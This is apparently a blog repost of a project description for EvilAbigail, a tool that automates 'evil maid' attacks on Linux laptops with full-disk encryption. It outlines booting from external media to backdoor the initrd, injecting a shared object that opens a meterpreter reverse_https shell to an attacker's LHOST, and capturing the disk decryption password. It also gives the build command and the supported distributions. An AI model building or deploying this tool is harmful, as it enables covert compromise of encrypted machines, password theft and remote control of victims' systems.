EvilAbigail - Automated Linux evil maid attack



  • Laptop left turned off with FDE turned on
  • Attacker boots from USB/CD/Network
  • Script executes and backdoors initrd
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7

Current Features

  • python/meterpreter/reverse_https to compile time LHOST
  • FDE decryption password stored in meterpreter environment (getenv PASSWORD)



See the Makefile for more information/configuration, LHOST is required in the environment to build the .so as msfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.
Generic Instructions (builds iso image in cwd): LHOST= make rev.so iso


The following options have been appended to the kernel boot:
mc superuser nodhcp quiet loglevel=0
Furthermore, the prompt value has been set to 0 to allow fully automated execution.


Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)


core.d is an unpacked core.gz from TinyCore with the below packages merged in.
Core-current is an unpacked Core-current.iso
The following packages have been installed inside tinycore (python, filesystem support):
  • bzip2-lib.tcz
  • filesystems-3.16.6-tinycore.tcz
  • gdbm.tcz
  • libffi.tcz
  • mtd-3.16.6-tinycore.tcz
  • ncurses.tcz
  • openssl.tcz
  • python.tcz
  • readline.tcz
  • sqlite3.tcz
Powered by Blogger.